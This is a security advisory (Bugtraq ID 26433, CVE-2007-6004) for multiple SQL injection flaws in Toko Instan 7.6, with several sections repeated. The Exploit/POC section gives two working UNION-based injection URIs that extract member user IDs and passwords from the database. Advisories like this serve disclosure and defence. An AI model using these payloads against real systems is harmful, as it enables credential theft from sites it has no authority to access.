Toko Instan Index.PHP Multiple SQL Injection Vulnerabilities
BID:26433
Info
Toko Instan Index.PHP Multiple SQL Injection Vulnerabilities
| Bugtraq ID: | 26433 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-6004 |
| Remote: | Yes |
| Local: | No |
| Published: | Nov 14 2007 12:00AM |
| Updated: | Nov 23 2007 08:54PM |
| Credit: | k1tk4t is credited with the discovery of these vulnerabilities. |
| Vulnerable: |
Tokohandal.com Toko Instan 7.6 |
| Not Vulnerable: | |
Discussion
Toko Instan Index.PHP Multiple SQL Injection Vulnerabilities
Toko Instan is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Toko Instan 7.6 is vulnerable; other versions may also be affected.
Toko Instan is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Toko Instan 7.6 is vulnerable; other versions may also be affected.
Exploit / POC
Toko Instan Index.PHP Multiple SQL Injection Vulnerabilities
An attacker can exploit these issues via a browser.
The following proof-of-concept URIs are available:
http://www.example.com/index.php?cm=artikel&cp=show&id=-1/**/union/**/select/**/null,null,null,null,null,userid,password,null,null/**/from/**/member/*
http://www.example.com/index.php?cm=produk&cp=show&katid=-1/**/union/**/select/**/null,null,null,null,null,null,null,null,null,null,null,concat(userid,0x3a,password)/**/from/**/member/*
An attacker can exploit these issues via a browser.
The following proof-of-concept URIs are available:
http://www.example.com/index.php?cm=artikel&cp=show&id=-1/**/union/**/select/**/null,null,null,null,null,userid,password,null,null/**/from/**/member/*
http://www.example.com/index.php?cm=produk&cp=show&katid=-1/**/union/**/select/**/null,null,null,null,null,null,null,null,null,null,null,concat(userid,0x3a,password)/**/from/**/member/*
Solution / Fix
Toko Instan Index.PHP Multiple SQL Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: mailto:[email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: mailto:[email protected].
References
Toko Instan Index.PHP Multiple SQL Injection Vulnerabilities
References:
References:
- Vendor Homepage (Tokohandal.com)